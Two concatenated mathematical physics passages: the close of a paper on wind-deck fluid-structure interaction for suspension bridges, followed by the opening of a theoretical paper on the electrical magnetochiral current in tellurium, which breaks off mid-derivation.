\(\Lambda_{1}\in(0,\Lambda]\) and a unique curve \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that for \(\lambda\in[0,\Lambda_{1})\) the unique solution to (6.1) is given by \((u(\lambda,\mathfrak{h}(\lambda)),p(\lambda,\mathfrak{h}(\lambda)),\mathfrak{ h}(\lambda))\). By (6.4), \(\mathfrak{h}(\lambda)\equiv 0\) and the unique solution to (6.1) is \((u^{0}(\lambda,0),p^{0}(\lambda,0),0)\). ## 7. An application: equilibrium positions of the deck of a bridge A suspension bridge is usually erected starting from the anchorages and the towers. Then the sustaining cables are installed between the two couples of towers and the hangers are hooked to the cables. Once all these components are in position, they furnish a stable working base from which the deck can be raised from floating barges. We refer to [16, Section 15.23] for full details. The deck segments are put in position one aside the other (see Figure 6, left) and have the shape of rectangles while their cross-section resembles to smoothened irregular hexagons (see Figure 6, right) that satisfy (2.1). This cross-section \(B\) plays the role of the obstacle in (2.4) while \(\Omega_{h}\) is the region filled by the air. This region can be either be a virtual box around the deck of the bridge or a wind tunnel around a scaled model of the bridge. In both cases, we may refer to inflow and outflow also as windward and leeward respectively: \(\lambda V_{\text{in}}e_{1}\) represents the laminar horizontal windward while \(\lambda V_{\text{out}}e_{1}\) is the leeward. Typically, the higher is the Figure 5. The cut-off functions \(\zeta_{l}\) (left) and \(\zeta_{r}\) (right) on \(\overline{R}\) when \(U=1\) for the symmetric configuration. altitude the stronger is the wind. Therefore, in this application we consider specific laminar shear flows, which are the Couette flows. Thus, the inflow and outflow now read \[V_{\rm in}(x_{2})=V_{\rm out}(x_{2})=\frac{U}{2H}(x_{2}+H)\qquad\text{for}\qquad x _{2}\in[-H,H], \tag{7.1}\] and satisfy (2.3). The windward creates both vertical and torsional displacements of the deck. However, the cross-section of the suspension bridge is also subject to some elastic restoring forces tending to maintain the deck in its original position \(B_{0}\). These forces are of three different kinds. There is an upwards restoring force due to the elastic action of both the hangers and the sustaining cables of the bridge. The hangers behave as nonlinear springs which may slacken [1, 9-VI] so that they have no downwards action and they be nonsmooth. There is the weight of the deck which acts constantly downwards: this is why there is no odd requirement on the restoring force considered in the model. There is also a nonlinear resistance to both elastic bending and stretching of the whole deck for which \(B\) merely represents a cross-section. Moreover, since the boundary of the channel \(R\) is virtual and our physical model breaks down in case of collision of \(B\) with \(\partial R\), we require that there exists an "unbounded force" preventing collisions. Overall, the position of \(B\) depends on both the displacement parameter \(h\) and the angle of rotation \(\theta\) with respect to the horizontal axis. With the addition of this second degree of freedom, we have \(B=B_{h,\theta}\) and \(\Omega=\Omega_{h,\theta}\). A "plastic" regime leading to the collapse of the bridge is reached when \(\theta=\pm\frac{\pi}{4}\) (see [1]) since the sustaining cables of the bridge attain their maximum elastic tension. The strong point of the analysis carried out in this paper is that it applies independently of the part of \(\partial B\) closest to \(\partial R\). Therefore, for any \(\theta\in(-\frac{\pi}{4},\frac{\pi}{4})\), we can apply our general theory considering the family of bodies \(B_{h,\theta}\) simply by adapting it to the rotating scenario. The only difference now is that, when the body is free to rotate, the collision with \(\Gamma_{b}\) and \(\Gamma_{t}\) occurs at \(h=-H+\delta_{b}(\theta)\) and \(h=H-\delta_{t}(\theta)\), where \(\delta_{b}(\theta)\) and \(\delta_{t}(\theta)\) are positive functions of \(\theta\). For \(\theta=0\), \(\delta_{b}(0)\) and \(\delta_{t}(0)\) are as in (2.2) while, for \(\theta\neq 0\), \[\delta_{b}(\theta):=-\min_{(x_{1},x_{2})\in\partial B_{h,\theta}}x_{2}>0, \qquad\delta_{t}(\theta):=\max_{(x_{1},x_{2})\in\partial B_{h,\theta}}x_{2}>0,\] both being independent of \(h\). Due to the possible complicated shape of \(B\), these functions are not easy to be determined explicitly. For this reason, we define the set Figure 6. Left: section of a suspension bridge. Right: sketch of a cross-section. of non-contact values of \((h,\theta)\) by \[A=\{(h,\theta)\in(-H,H)\times(-\tfrac{\pi}{4},\tfrac{\pi}{4})\ :\ B_{h,\theta} \subset R\}. \tag{7.2}\] Clearly, \((0,0)\in A\) and \((h,\theta)\in\partial A\) if and only if \(B_{h,\theta}\cap\partial R\neq\emptyset.\) We assume that, for some \(K>0\), \(f\in C^{0}(A)\) satisfies \[\begin{split}&\limsup_{d(B_{h,\theta},\Gamma_{b})\to 0}\ f(h, \theta)(d(B_{h,\theta},\Gamma_{b}))^{3/2}\leq-K,\\ &\liminf_{d(B_{h,\theta},\Gamma_{t})\to 0}\ \frac{f(h,\theta)}{ \max\{(d(B_{h,\theta},\Gamma_{t}))^{-3/2},U(d(B_{h,\theta},\Gamma_{t}))^{-3} \}}\geq K,\end{split} \tag{7.3}\] where \(d(\cdot,\cdot)\) is the distance function. Assumption (7.3) generalizes (3.3) taking into account the rotational degree of freedom. Moreover, we assume that \[\begin{split}&\exists\gamma>0\quad\text{s.t.}\quad\frac{f(h_{1}, \theta)-f(h_{2},\theta)}{h_{1}-h_{2}}\geq\gamma\qquad\forall(h_{1},\theta),(h_ {2},\theta)\in A,\\ & f(0,0)=0,\qquad f(h,\theta)\theta>0\quad\forall(h,\theta)\in A \quad\text{with}\quad\theta\neq 0.\end{split} \tag{7.4}\] In fact, the second line in (7.4) is not mathematically needed but, from a physical point of view, it states that the restoring force does not act at equilibrium and tends to maintain \(B\) in an horizontal position. A straightforward consequence of Theorem 3.1, in the case of the interaction between the wind and the deck of a suspension bridge, is the following: **Corollary 7.1**.: _Let \(V_{\mathrm{in}}\), \(V_{\mathrm{out}}\) be as in (7.1) and \(f\in C^{0}(A)\) satisfy (7.3)-(7.4). There exists \(\Lambda_{1}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that, for \(\lambda\in[0,\Lambda_{1})\) and \(\theta\in(-\tfrac{\pi}{4},\tfrac{\pi}{4})\), the FSI problem (3.4) admits a unique solution \((u_{\theta}(\lambda,h),p_{\theta}(\lambda,h),h)\in H^{2}(\Omega_{h,\theta}) \times H^{1}(\Omega_{h,\theta})\times(-H,H)\), with \((h,\theta)\in A\), given by_ \[(u_{\theta}(\lambda,\mathfrak{h}(\lambda)),p_{\theta}(\lambda,\mathfrak{h}( \lambda)),\mathfrak{h}(\lambda)).\] _Here, (3.4) is understood with \(h\) replaced by the couple \((h,\theta)\)._ The deck of a suspension bridge, in particular its cross-section, may have a nonsmooth boundary. If \(B\) is not \(W^{2,\infty}\) but it is only Lipschitzian, Theorem 2.2 ceases to hold and we only know that \((u,p)\) is a weak solution to (2.4) so that (3.1) does not hold in a "strong" sense. Indeed, since \(u\in H^{1}(\Omega_{h})\), see (2.7), we may rewrite the first equation in (2.4) as \(-\mu\Delta u+\nabla p=f\) with \(f\in L^{q}(\Omega_{h})\) for all \(q<2\). Hence, \(f\in H^{-\epsilon}(\Omega_{h})\) for any \(\epsilon>0\). By applying [17, Theorem 7] we then deduce that \(u\in H^{1+s}(\Omega_{h})\) and \(p\in H^{s}(\Omega_{h})\) for all \(s<1/2\) but, still, this does not allow to consider the trace of \(\mathbb{T}(u,p)\) as an integrable function over \(\partial B_{h}\). However, following [9] we may define the lift \(L\) through a generalized formula. Indeed, from \(u\in H^{1}(\Omega_{h})\) we know that \(\mathbb{T}(u,p)\in L^{2}(\Omega_{h})\) and, since \(\Omega_{h}\) is a bounded domain, \(\mathbb{T}(u,p)\in L^{3/2}(\Omega_{h})\). Moreover, from the first equation in (2.4) we obtain \(\nabla\cdot\mathbb{T}(u,p)\in L^{3/2}(\Omega_{h})\). Therefore \(\mathbb{T}(u,p)\in E_{3/2}(\Omega_{h}):=\{f\in L^{3/2}(\Omega_{h})\ |\ \nabla \cdot f\in L^{3/2}(\Omega_{h})\}\). By Theorem III.2.2 in [4] we know that \(\mathbb{T}(u,p)n_{|_{\partial\Omega_{h}}}\in W^{-2/3,3/2}(\partial\Omega_{h})\). Hence, if \(\partial B_{h}\) is Lipschitzian and \((u,p)\) is a weak solution to (2.4), then the lift exerted by the fluid over \(B_{h}\) is \[L(\lambda,h)=-e_{2}\ \cdot\langle\mathbb{T}(u,p)n,1\rangle_{\partial B_{h}}, \tag{7.5}\] where \(\langle\cdot,\cdot\rangle_{\partial B_{h}}\) denotes the duality pairing between \(W^{-2/3,3/2}(\partial B_{h})\) and \(W^{2/3,3}(\partial B_{h})\). ### Acknowledgments The authors were partially supported by the PRIN project _Direct and inverse problems for partial differential equations: theoretical aspects and applications_ and by the Gruppo Nazionale per l'Analisi Matematica, la Probabilita e le loro Applicazioni (GNAMPA) of the Istituto Nazionale di Alta Matematica (INdAM). **Data availability statement.** Data sharing not applicable to this article as no datasets were generated or analysed during the current study. There are no conflicts of interest.
2308.10358
Electrical Magnetochiral current in Tellurium
We have studied theoretically the effect of Electrical Magneto-Chiral Anisotropy (eMChA) in $p$-type tellurium crystals. It is shown that the terms $k_i B_j$ in the hole Hamiltonian, linear both in the wave vector ${\mathbf k}$ and the magnetic field ${\mathbf B}$, do not lead to the eMChA and one needs to include the higher-order terms like $k_i^3 B_j$. Two microscopic mechanisms of the effect are considered. In the first one only elastic scattering of holes by impurities or imperfections are taken into consideration only. In the second mechanism, besides the elastic scattering processes the hole gas heating and its energy relaxation are taken into account. It is demonstrated that he both contributions to the magneto-induced rectification are comparable in magnitude. The calculation is performed by using two independent approaches, namely, in the time relaxation approximation and in the limit of of small chiral band parameter $\beta$. A bridge is thrown between the eMChA and magneto-induced photogalvanic effects.
L. E. Golub, E. L. Ivchenko, B. Spivak
2023-08-20T20:17:03Z
http://arxiv.org/abs/2308.10358v1
# Electrical Magnetochiral current in Tellurium ###### Abstract We have studied theoretically the effect of Electrical Magneto-Chiral Anisotropy (eMChA) in \(p\)-type tellurium crystals. It is shown that the terms \(k_{i}B_{j}\) in the hole Hamiltonian, linear both in the wave vector \(\mathbf{k}\) and the magnetic field \(\mathbf{B}\), do not lead to the eMChA and one needs to include the higher-order terms like \(k_{i}^{3}B_{j}\). Two microscopic mechanisms of the effect are considered. In the first one only elastic scattering of holes by impurities or imperfections are taken into consideration only. In the second mechanism, besides the elastic scattering processes the hole gas heating and its energy relaxation are taken into account. It is demonstrated that he both contributions to the magneto-induced rectification are comparable in magnitude. The calculation is performed by using two independent approaches, namely, in the time relaxation approximation and in the limit of small chiral band parameter \(\beta\). A bridge is thrown between the eMChA and magneto-induced photogalvanic effects. ## I Introduction Tellurium is an elemental chiral crystal with a D\({}_{3}\) point symmetry. It has a natural optical activity [1; 2], and it is tellurium where the Circular Photogalvanic effect [3; 4], electric-current induced optical activity [5; 6] and bulk Circular Photon Drag effect [7] were discovered; Sakano et al. has for the first time verified experimentally the spin texture of the right- and left-handed tellurium by the ARPES and SARPES measurements [8]. Recently, Rikken and Avarvari observed the effect of Electrical Magneto-Chiral Anisotropy (eMChA) in Te crystals [9]. This effect manifests itself as an additional contribution to the sample resistance \(R=R_{0}(1+\gamma BI)\), where \(R_{0}\) is a constant, \(B\) is the magnetic field strength, \(I\) is the electric current, and the coefficient of bilinear magneto-electric resistance \(\gamma\) describes a rectification by the sample, see Refs. [10; 11] for reviews. Earlier, the effect of chirality (or non-reciprocity) in magnetotransport has been observed in a number of other gyrotropic materials: distorted bismuth wires [12], carbon nanotubes [13; 14], crystals of chiral salt (DM-EDT-TTF)\({}_{2}\)ClO\({}_{4}\)[15], polar semiconductor crystal BiTeBr [16], topological insulators [17; 18; 19; 20; 21], semimetals ZrTe\({}_{5}\)[22], WTe\({}_{2}\)[23] and \(\alpha\)-Sn [24], and on the surface of SrTiO\({}_{3}\)(111) [25]. Theoretically, the eMChA effect has been considered for carbon nanotubes [26; 27], Weyl semimetals of TaAs type [28], semimetal ZrTe\({}_{5}\)[22] (Supplemental Material), surface states in topological insulators [29] and molecular conductors [30]. In the works [22; 29], a calculation of the correction to the electric current \(\delta j\propto E^{2}B\), proportional to the squared electric field strength \(E\) and linear in the magnetic field \(B\), has been performed in the simplest approximation of a general relaxation time (\(\tau\)-approximation). This approach does not take into account a difference between quasimomentum and energy relaxations, or between elastic and inelastic relaxation processes of free charge carriers. In this paper we show that, with account for this difference, there are two independent microscopic mechanisms of eMChA. In a simplified form, the presence of two mechanisms can be explained as follows: Let us divide a correction to the charge carrier distribution function \(\delta f_{\mathbf{k}}\propto E^{2}\) in two terms, \(\delta f(\varepsilon_{\mathbf{k}})\) and \(\delta f_{\mathbf{k}}^{\text{ss}}\), where the first function depends on the carrier energy \(\varepsilon_{\mathbf{k}}\) (\(\mathbf{k}\) is a wavevector), and the second function, \(\delta f_{\mathbf{k}}^{\text{ss}}\), is an asymmetric correction with zero average over the directions of the wavevector \(\mathbf{k}\) at constant energy. The correction \(\delta f_{\mathbf{k}}^{\text{ss}}\) is controlled by the momentum relaxation time \(\tau_{p}\), while in order to calculate \(\delta f(\varepsilon_{\mathbf{k}})\) one must account for inelastic processes of carrier-phonon interaction and, hence, introduce the energy relaxation time \(\tau_{\varepsilon}\) which can be much longer than \(\tau_{p}\). As noticed in Ref. [26], although the correction \(\delta f(\varepsilon_{\mathbf{k}})\propto\tau_{\varepsilon}\) by itself does not result in the electric current, its relaxation through interaction with phonons produces an asymmetric distribution of carriers in the \(\mathbf{k}\) space with an extra multiplier \(\tau_{p}/\tau_{\varepsilon}\). As a result, the mechanisms related to \(\delta f_{\mathbf{k}}^{\text{ss}}\) and \(\delta f(\varepsilon_{\mathbf{k}})\) lead to comparable contributions to the electrical magneto-chiral current \(\delta j\propto\tau_{p}^{2}E^{2}B\). Here we consider both mechanisms resulting in eMChA of holes in the Te valence band. The paper is organized as follows. In Sec. 2, macroscopic equations are presented. General consideration of eMChA effect in Te is given in Sec. III. In Sec. IV, the eMChA current is estimated in the relaxation-time approximation. Sections V and VII are devoted to rigorous calculations of the contributions caused by the elastic and inelastic relaxation processes, respectively. The perturbative results in the lowest order in the chirality parameter are presented in Sec. VI. In Sec. VIII, discussion of results is given, and Sec. IX summarizes the paper. ## II Macroscopic equations The phenomenon under study is described by a fourth-rank tensor in the expansion of the electric current density in powers of the electric field strength \(\mathbf{E}\) and mag netic field \(\mathbf{B}\) \[j_{i}=\sigma_{ij}E_{j}+\sigma^{(H)}_{ijk}E_{j}B_{k}+G_{ijk}E_{j}E_{k}B_{l}\:. \tag{1}\] The first two terms are allowed by any point symmetry, \(\mathbf{\sigma}\) is the tensor of linear conductivity and \(\sigma^{(H)}_{ijk}\) is the Hall conductivity tensor. The eMChA effect is represented by the magnetochiral tensor \(\mathbf{G}\) symmetrical in indices \(j\) and \(k\). It is related by \[G_{ijkl}\propto\gamma_{ij^{\prime}k^{\prime}l}\sigma_{j^{\prime}j}\sigma_{k^{ \prime}k}\] with the tensor \(\mathbf{\gamma}\) which is introduced in Eq. (1) in Ref. [9] and describes the second-harmonics generation \[E^{2\omega}_{i}=\gamma_{ijkl}j^{\omega}_{j}j^{\omega}_{k}B_{l}\:,\] under conditions where the modulation period \(T=2\pi/\omega\) exceeds by far all the microscopic times of the system. In crystals of D\({}_{3}\) symmetry there are ten linearly-independent components of the \(G_{ijkl}\) tensor with indices \(zzzz\), \(xxxx\), \(zzxx\), \(xxzz\), \(xzxz\), \(xyyx\), \(zxxy\), \(zxxy\) and \(xzxy\)[31]. Note that, in this point group, the component \(G_{xxyy}\) equals to \((G_{xxxx}-G_{xyyx})/2\). In Ref. [9], the following estimates are given: \(12G_{zzzz}\approx G_{xxxy}\approx 3G_{xxxx}\), and the inequality \(G_{zzzz}\ll G_{zzzz}\) is presented. This contradicts the point symmetry D\({}_{3}\) where the nonzero components \(G_{zzzz}\) and \(G_{xxxy}\) are forbidden. In our work the attention is focused on the components \(G_{zzzz}\) and \(G_{xxxx}\) allowed by the symmetry, i.e., on the geometries \(\mathbf{j}\parallel\mathbf{E}\parallel\mathbf{B}\parallel z\) (shortly \(z\)-eMChA geometry) and \(\mathbf{j}\parallel\mathbf{E}\parallel\mathbf{B}\parallel x\) (\(x\)-eMChA). In these cases the Hall effect does not appear and hence is not discussed here. We use the notation \(\delta\mathbf{j}\) for the electric magnetochiral (eMCh) current, or the third term in Eq. (1). The paper is devoted to consideration of this particular current. With acoount for the symmetry, the macroscopic relation between the correction to the current \(\delta\mathbf{j}\) and the electric and magnetic vectors can be written in the following convenient form \[\delta j_{z} = G^{(1)}E_{z}^{2}B_{z}+G^{(2)}(E_{x}^{2}+E_{y}^{2})B_{z}+G^{(3)}[ (E_{x}^{2}-E_{y}^{2})B_{y}+2E_{x}E_{y}B_{x}]+G^{(4)}E_{z}(E_{x}B_{x}+E_{y}B_{y })\:, \tag{2}\] \[\delta j_{x} = G^{(5)}(E_{x}^{2}+E_{y}^{2})B_{x}+G^{(6)}E_{z}^{2}B_{x}+G^{(7)}[ (E_{x}^{2}-E_{y}^{2})B_{x}+2E_{x}E_{y}B_{y}]+G^{(8)}2E_{x}E_{y}B_{z}\] \[+\ G^{(9)}E_{x}E_{z}B_{z}+G^{(10)}E_{z}(E_{x}B_{y}+E_{y}B_{x})\:,\] \[\delta j_{y} = G^{(5)}(E_{x}^{2}+E_{y}^{2})B_{y}+G^{(6)}E_{z}^{2}B_{y}+G^{(7)}[ -(E_{x}^{2}-E_{y}^{2})B_{y}+2E_{x}E_{y}B_{x}]+G^{(8)}(E_{x}^{2}-E_{y}^{2})B_{z}\] \[+\ G^{(9)}E_{y}E_{z}B_{z}+G^{(10)}E_{z}(E_{x}B_{x}-E_{y}B_{y})\:,\] where \(G^{(n)}\) (\(n=1\ldots 10\)) are macroscopic parameters. The material relation between \(\delta j_{x}\), \(\delta j_{y}\) and the transverse components of vectors \(\mathbf{E}\) and \(\mathbf{B}\) has an axial symmetry and preserves its form at any orientation of the \(x,y\) axes relative to the second-order symmetry axes C\({}_{2}\). ## III General consideration The current \(\delta j_{z}\propto G_{zzzz}\) is induced in the magnetic field \(\mathbf{B}\parallel z\). In presence of this field, the effective 2\(\times\)2 valence-band Hamiltonian in Te has the following form [32; 33; 4] \[\mathcal{H}=\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}+(\beta k_{z }+gB_{z})\sigma_{z}+\Delta_{2}\sigma_{x}\:. \tag{3}\] Here \(\mathbf{k}\) is a wavevector, \(k_{\perp}^{2}=k_{x}^{2}+k_{y}^{2}\), \(\sigma_{x}\) and \(\sigma_{z}\) are the pseudospin Pauli matrices in the basis \(\pm 3/2\) (the reducible representation \(\mathcal{D}=H_{4}+H_{5}\)), \(\Delta_{2}\) is the spin-orbit half-splitting of the valence-band states \[(|3/2\rangle\pm|-3/2\rangle)/\sqrt{2}\] at the \(H\) point of the Brillouin zone, the parameter \(g\) describes the Zeeman effect, the parameters \(\mathcal{A}_{1},\mathcal{A}_{2}\) are responsible for parabolic scalar terms, and the coefficient \(\beta\) determines strength of \(k_{z}\)-linear term, it has opposite signs in the two Te enantiomers D\({}_{3}^{4}\) and D\({}_{3}^{6}\) (or P\({}_{3}\)121 and P3\({}_{2}\)21). Hereafter we use the hole representation and take \(\mathcal{A}_{1,2}>0\). We study magnetoelectric transport of holes occupying the lowest valence band of Te (uppermost in the electron representation). According to Eq. (3) its energy dispersion relation is given by \[\varepsilon_{\mathbf{k}}=\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}- \sqrt{\Delta_{2}^{2}+(\beta k_{z}+gB_{z})^{2}}+\Delta_{2}. \tag{4}\] Since we are interested in linear-\(\mathbf{B}\) effects, we make an expansion \(\varepsilon_{\mathbf{k}}\approx\varepsilon_{\mathbf{k}}^{0}+\delta\varepsilon_{\mathbf{k}}\), where the zero-field energy is \[\varepsilon_{\mathbf{k}}^{0}=\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}- \sqrt{\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}+\Delta_{2}\:, \tag{5}\] and the correction \[\delta\varepsilon_{\mathbf{k}}=-gB_{z}\eta(k_{z}),\qquad\eta=\frac{\beta k_{z}}{ \sqrt{\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}}\:. \tag{6}\] The hole energy dispersion at zero magnetic field and at \(B_{z}\neq 0\) is illustrated in Fig. 1. At \(B_{z}=0\) the eigenvectors of the Hamiltonian (3) are two-component columns \[u^{0}_{k_{z}}=\frac{1}{\sqrt{2}}\left[\begin{array}{c}\sqrt{1+\eta(k_{z})}\\ \sqrt{1-\eta(k_{z})}\end{array}\right]\,. \tag{7}\] The dispersion \(\varepsilon^{0}_{\mathbf{k}}\) has the camel's back shape with the energy minimum \(\varepsilon_{m}=-\Delta^{2}\mathcal{A}_{1}/\beta^{2}\). At fixed hole energy \(\varepsilon^{0}_{\mathbf{k}}=\varepsilon\geq\varepsilon_{m}\) the values of \(k_{\perp}^{2}\) lie in the range between \(0\) and \(\sqrt{(\varepsilon-\varepsilon_{m})/\mathcal{A}_{2}}\) while the values of \(k_{z}\) fill the the range \(K_{z}(\varepsilon)\) containing two intervals \([-\kappa(\varepsilon),-\kappa^{\prime}(\varepsilon)]\) and \([\kappa^{\prime}(\varepsilon),\kappa(\varepsilon]\), where \[\kappa(\varepsilon) =\sqrt{\frac{\varepsilon-\Delta+\sqrt{\Delta^{2}+\beta^{2} \varepsilon/\mathcal{A}_{1}}}{\mathcal{A}_{1}}}\,, \tag{8}\] \[\kappa^{\prime}(\varepsilon) =\sqrt{\frac{\varepsilon-\Delta-\sqrt{\Delta^{2}+\beta^{2} \varepsilon/\mathcal{A}_{1}}}{\mathcal{A}_{1}}}\,,\] and \(\Delta=\Delta_{2}-\beta^{2}/(2\mathcal{A}_{1})\). For \(\varepsilon>0\), the value of \(\kappa^{\prime}\) should be set to \(0\) and the range \(K_{z}(\varepsilon)=[-\kappa(\varepsilon),\kappa(\varepsilon)]\). For calculation of the \(G_{xxxx}\) component one should add to the Hamiltonian (3) scalar terms linear in \(B_{x}\) and odd in \(k_{x}\), see the next section. The eMCh current density is calculated in the standard way with the help of the hole distribution function \(f_{\mathbf{k}}\) as follows \[\delta\mathbf{j}=2e\sum_{\mathbf{k}}\mathbf{v}(\mathbf{k})f_{\mathbf{k}}\,, \tag{9}\] where \(e>0\) is the elementary charge, the factor \(2\) accounts for the two valleys \(H\) and \(H^{\prime}\), and \(\mathbf{v}(\mathbf{k})\) is the hole velocity \(\hbar^{-1}\partial\varepsilon_{\mathbf{k}}/\partial\mathbf{k}\). In the \(z\)-eMChA geometry, the distribution function \(f_{\mathbf{k}}\) is dependent on \(k_{z}\) and \(k_{\perp}^{2}\) and independent of the azimuth angle between \(\mathbf{k}_{\perp}\) and the \(x\) axis. It is helpful to change variables from \((k_{z},k_{\perp}^{2})\) to \((k_{z},\varepsilon^{0}_{\mathbf{k}})\) bearing in mind that \[k_{\perp}^{2}=\frac{1}{\mathcal{A}_{2}}\bigg{(}\varepsilon^{0}_{\mathbf{k}}+\sqrt {\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}-\Delta_{2}\bigg{)}\,.\] Thus, all functions \(k_{z}\) and \(k_{\perp}^{2}\) are treated as dependent on \(k_{z}\) and energy \(\varepsilon^{0}_{\mathbf{k}}\), \(\mathcal{F}(k_{z},\varepsilon^{0}_{\mathbf{k}})\). A sum of any function \(\mathcal{F}(k_{z},\varepsilon^{0}_{\mathbf{k}})\) over \(\mathbf{k}\) is calculated as follows \[\sum_{\mathbf{k}}\mathcal{F}(k_{z},\varepsilon^{0}_{\mathbf{k}})=g_{2D}\int\limits_{ \varepsilon_{m}}^{\infty}\!\mathrm{d}\varepsilon^{0}_{\mathbf{k}}\int\limits_{K _{z}(\varepsilon^{0}_{\mathbf{k}})}\mathrm{d}k_{z}\mathcal{F}(k_{z},\varepsilon^ {0}_{\mathbf{k}})\,, \tag{10}\] where \(g_{2D}=1/(8\pi^{2}\mathcal{A}_{2})\) is the density of states for two-dimensional motion in the \((xy)\) plane. In the following we consider the case where the energy minimum \(\varepsilon_{m}\) is small compared with the average hole energy and use the limits \([-\kappa(\varepsilon_{\mathbf{k}}),\kappa(\varepsilon_{\mathbf{k}})]\) and \((0,\infty)\) of integration over \(k_{z}\) and \(\varepsilon^{0}_{\mathbf{k}}\) in equations like Eq. (10). The distribution function obeys the Boltzmann kinetic equation \[\frac{e}{\hbar}\mathbf{E}\cdot\frac{\partial f_{\mathbf{k}}}{\partial\mathbf{k}}+\hat{ \mathcal{I}}^{(\mathrm{el})}_{\mathbf{k}}[f]+\hat{\mathcal{I}}^{(\mathrm{inel})}_{ \mathbf{k}}[f]=0\,, \tag{11}\] where the left-hand side contains the force and collision terms respectively. The collision integral consists of two contributions describing elastic and inelastic hole scattering. We will solve Eq. (11) by iterations up to the second order in \(\mathbf{E}\) and, therefore, present \(f_{\mathbf{k}}\) as a sum \(f_{0}(\varepsilon_{\mathbf{k}})+f_{1}(\mathbf{k})+f_{2}(\mathbf{k})\) with \(f_{0}(\varepsilon_{\mathbf{k}})\) being the Fermi-Dirac distribution and \(f_{n}\propto E^{n}\). ## IV Relaxation time approximation We use the relaxation-time approximation taking the collision integral in the form \[\hat{\mathcal{I}}_{\mathbf{k}}[f]=\frac{f_{\mathbf{k}}-f_{0}(\varepsilon_{\mathbf{k}})}{\tau} \tag{12}\] with \(\tau\) being a constant. This corresponds to fast energy relaxation with a rate equal to the elastic scattering rate. Then the corrections of the first and second orders in \(E_{z}\) are given by \[f_{1}(\mathbf{k}) = -e\tau E_{z}f^{\prime}_{0}(\varepsilon_{\mathbf{k}})v_{z}\,, \tag{13}\] \[f_{2}(\mathbf{k}) = -\frac{e\tau E_{z}}{\hbar}\frac{\partial f_{1}(\mathbf{k})}{\partial k _{z}}\,,\] where \(f^{\prime}_{0}(\varepsilon)=\partial f_{0}(\varepsilon)/\partial\varepsilon\). Substitution of \(f_{\mathbf{k}}=f_{2}(\mathbf{k})\) into Eq. (9) and integration by parts yields for the eMCh current density \[\delta j_{z}=2\frac{e^{3}(\tau E_{z})^{2}}{\hbar^{3}}\sum_{\mathbf{k}}f_{0}( \varepsilon_{\mathbf{k}})\frac{\partial^{3}\varepsilon_{\mathbf{k}}}{\partial k_{z}^{3 }}\,. \tag{14}\] An analogous result was obtained previously for 1D transport in quantum wires [20]. Expanding \[f_{0}(\varepsilon^{0}_{\mathbf{k}}+\delta\varepsilon_{\mathbf{k}})\approx f_{0}( \varepsilon^{0}_{\mathbf{k}})+f^{\prime}_{0}(\varepsilon^{0}_{\mathbf{k}})\delta \varepsilon_{\mathbf{k}}\;, \tag{15}\] Figure 1: The lowest valence subband of tellurium in the hole representation in the vicinity of the \(H\) point. The curves show the hole energy dispersion \(\varepsilon_{\mathbf{k}}\) vs. \(k_{z}\) at \(k_{\perp}=0\) in the absence (dashed) and presence (solid) of the magnetic field \(\mathbf{B}\parallel z\). calculating the third derivatives of \(\varepsilon_{\mathbf{k}}^{0}\) and \(\delta\varepsilon_{\mathbf{k}}\) and integrating by parts we obtain \[G_{zzzz}=-12\frac{e^{3}\tau^{2}\mathcal{A}_{1}g\beta}{\hbar^{3}\Delta_{2}}\sum_{ \mathbf{k}}\eta^{2}(k_{z})\zeta^{3}(k_{z})f_{0}^{\prime}(\varepsilon_{\mathbf{k}}^{0})\:, \tag{16}\] where \[\zeta(k_{z})=\frac{\Delta_{2}}{\sqrt{\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}}=\sqrt {1-\eta^{2}(k_{z})}. \tag{17}\] For degenerate hole gas with the Fermi energy \(\varepsilon_{F}>0\) we come to the final equation \[G_{zzzz}=g\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2} \hbar^{3}}\eta^{3}(\kappa_{\text{F}})\:, \tag{18}\] where \(\kappa_{\text{F}}=\kappa(\varepsilon_{\text{F}})\) and \(\kappa(\varepsilon)\) is defined by Eq. (8). An important result to stress is that, at small \(\beta\), the eMCh current is not linear but cubic function of \(\beta\). This can be understood taking \(\varepsilon_{\mathbf{k}}^{0}\) as \(\mathcal{A}_{1}k_{z}^{2}+A_{2}k_{\perp}^{2}\) and the magnetic-field induced correction to the energy as \(\delta\varepsilon=Pk_{z}\), where \(P=-gB_{z}\beta/\Delta_{2}\), and shifting the origin of the \(\mathbf{k}\)-space by \(k_{z}^{0}=P/(2\mathcal{A}_{1})\). In the new frame \(k_{z}^{\prime}=k_{z}+k_{z}^{0}\) we obtain a fully parabolic dispersion \(\varepsilon_{\mathbf{k}^{\prime}}=\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{ \perp}^{2}\) as in a centrosymmetric crystal where an aMCh current is forbidden. A similar calculation of the \(G_{xxxx}\) component with the following energy dispersion in the magnetic field \(\mathbf{B}\parallel x\) \[\varepsilon_{\mathbf{k}}=\varepsilon_{\mathbf{k}}^{0}+B_{x}k_{x}(\Xi_{\perp}k_{\perp}^ {2}+\Xi_{z}k_{z}^{2})\:, \tag{19}\] yields \[G_{xxxx}=2\frac{\mathcal{A}_{1}}{\mathcal{A}_{2}}\frac{e^{3}\tau^{2}}{\pi^{2} \hbar^{3}}\Xi_{\perp}k_{\text{F}}^{3}. \tag{20}\] Since the presence of a linear-\(k_{x}\) term is not enough to get the magnetochiral current, we took into account cubic-\(\mathbf{k}\) terms in Eq. (19). Note, however, that \(\Xi_{z}\) makes no contribution to the eMCh current because the third derivative \(\partial^{3}(k_{x}k_{z}^{2})/\partial k_{x}^{3}=0\), see Eq. (14). ### Microscopic interpretation of eMChA We give here the simplest interpretation of the eMChA current (14). In the external electric field \(E_{z}\) the equilibrium hole distribution is shifted in the \(\mathbf{k}\)-space by \(\delta k_{z}=eE_{z}\tau/\hbar\). Then in the simplest description one can present the nonequilibrium distribution function as \(f_{0}(\mathbf{k}_{\perp},k_{z}-\delta k_{z})\). Let us expand this function in powers of \(\delta k_{z}\) as follows 